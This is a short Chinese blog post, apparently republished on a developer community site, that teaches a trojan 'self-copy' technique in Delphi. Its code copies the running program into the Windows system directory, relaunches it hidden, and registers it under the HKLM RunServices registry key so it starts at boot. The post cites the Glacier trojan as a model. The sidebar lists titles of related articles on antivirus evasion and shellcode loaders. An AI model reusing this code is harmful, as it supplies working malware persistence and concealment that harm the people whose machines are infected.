AI 助理
备案控制台
开发者社区 安全 文章 正文

木马自我拷贝法[Delphi]

2006-08-09 756
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序.打开Delphi,新建一个工程,在窗口的Create事件中写代码:   procedure TForm1.FormCreate(Sender: TObject);var myname: string;beginmyname := ExtractFi

这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序.
打开Delphi,新建一个工程,在窗口的Create事件中写代码:

 

procedure TForm1.FormCreate(Sender: TObject);
var myname:  string ;
begin
myname : =  ExtractFilename(Application.Exename);  // 获得文件名
if  application.Exename  <>  GetWindir  +  myname then  // 如果文件不是在WindowsSystem那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir  +  myname), False); {将自己拷贝到WindowsSystem下}
Winexec(pchar(GetWindir  +  myname), sw_hide); // 运行WindowsSystem下的新文件
application.Terminate; // 退出
end;
end;
其中GetWinDir是自定义函数,起功能是找出WindowsSystem的路径.
function GetWinDir: String;
var
Buf: array[ 0 ..MAX_PATH] of  char ;
begin
GetSystemDirectory(Buf, MAX_PATH);
Result : =  Buf;
 if  Result[Length(Result)] <> ' ' then Result := Result +  ' ' ;
end; 

 

如何能使程序能在windows启动时自动启动?
 
为了程序能在Windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。
加入Registry单元,改写上面的窗口Create事件,改写后的程序如下:

 

procedure TForm1.FormCreate(Sender: TObject);
 const  K  =   ' SoftwareMicrosoftWindowsCurrentVersionRunServices ' ;
var myname:  string ;
begin
 {Write by Lovejingtao,http://Lovejingtao.126.com,Lovejingtao@21cn.com}
myname := ExtractFilename(Application.Exename); //获得文件名
if application.Exename <> GetWindir + myname then //如果文件不是在WindowsSystem那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{//将自己拷贝到WindowsSystem下}
Winexec(pchar(GetWindir + myname), sw_hide);//运行WindowsSystem下的新文件
application.Terminate;//退出
end;
with TRegistry.Create do
try
RootKey := HKEY_LOCAL_MACHINE;
OpenKey( K, TRUE );
WriteString( 'syspler', application.ExeName );
finally
free;
end;
end; 
文章标签:
安全
Windows
风月无边
目录
相关文章
@北鲲
|
网络协议 网络安全
Powershell免杀(无文件落地免杀)
无文件落地 顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。 通过两种方式进行无文件落地的免杀,一种是出网的情况,另一种为不出网情况。 声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。
@北鲲
1217 0
梦回阑珊~
|
C++
《C++避坑神器·九》小白也能轻易掌握动态链接库DLL的使用
《C++避坑神器·九》小白也能轻易掌握动态链接库DLL的使用
梦回阑珊~
190 0
乌鸦安全
|
安全 Go API
自写go加载器加壳免杀——过国内主流杀软
自写go加载器加壳免杀——过国内主流杀软
乌鸦安全
504 0
乌鸦安全
|
安全 Windows
【工具分享】免杀360&火绒的shellcode加载器
【工具分享】免杀360&火绒的shellcode加载器
乌鸦安全
409 0
乌鸦安全
|
安全 数据安全/隐私保护 C++
【免杀】C++静态免杀学习
【免杀】C++静态免杀学习
乌鸦安全
482 0
雷石安全实验室
|
安全 编译器 PHP
webshell免杀之函数与变量玩法
webshell免杀之函数与变量玩法
雷石安全实验室
259 0
忆凡
|
存储 JSON 小程序
走进小程序【三】小程序代码构成
走进小程序【三】小程序代码构成
忆凡
210 0
阿里云社区
|
安全 网络安全 PHP
文件包含漏洞原理解析_1 | 学习笔记
快速学习 文件包含漏洞原理解析_1
阿里云社区
175 0
文件包含漏洞原理解析_1 | 学习笔记
技术小阿哥
|
监控 安全 测试技术
木马技术补充:木马加壳
技术小阿哥
2034 0
技术小阿哥
|
安全 开发者 Windows
动态嵌入式DLL木马的发现与清除
技术小阿哥
1447 0

热门文章

最新文章

  • 1
    域名ICP备案时网站备注到底该怎么写?全网最全教程来了
  • 2
    网络安全-反弹shell详解(攻击,检测与防御)
  • 3
    上海ACE同城会演讲实录|云原生分布式数据库PolarDB-X
  • 4
    4.[研磨设计模式笔记]适配器模式
  • 5
    ORA-12514: TNS: 监听程序当前无法识别连接描述符中请求的服务
  • 6
    基于Windows 7中的 Ribbon开发技术应用
  • 7
    LVS+keepalived负载均衡兼高可用集群配置
  • 8
    移动应用图片的福音--七牛云存储
  • 9
    oracle与sql server大批量存储过程可以替换部分
  • 10
    lxde 桌面环境使用compiz-gtk
  • 1
    阿里云认证全新发布【Apsara Clouder云计算专项技能认证:云服务器ECS入门】
    14
  • 2
    阿里云云计算ACA、大数据ACA、人工智能ACA三门认证升级调整公告
    14
  • 3
    阿里云新版ACE考试通关经历回顾
    14
  • 4
    算法系列之排序算法-堆排序
    18
  • 5
    认证故事|阿里云新版ACE全球第五人考试经历回顾
    11
  • 6
    阿里云新版ACE考试通关经历回顾
    26
  • 7
    2024阿里云天池大学生竞赛正式开赛,全网招募高校最强大脑!
    13
  • 8
    「阿里云认证」年度标杆企业奖揭晓
    12
  • 9
    对话阿里云CIO蒋林泉:AI时代,企业如何做好智能化系统建设?
    12
  • 10
    基于惯性加权PSO优化的目标函数最小值求解matlab仿真
    13

    • 相关电子书

    更多
  • 15分钟打造你自己的小程序更新版
  • 低代码开发师(初级)实战教程
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    通义万相:视觉生成大模型再进化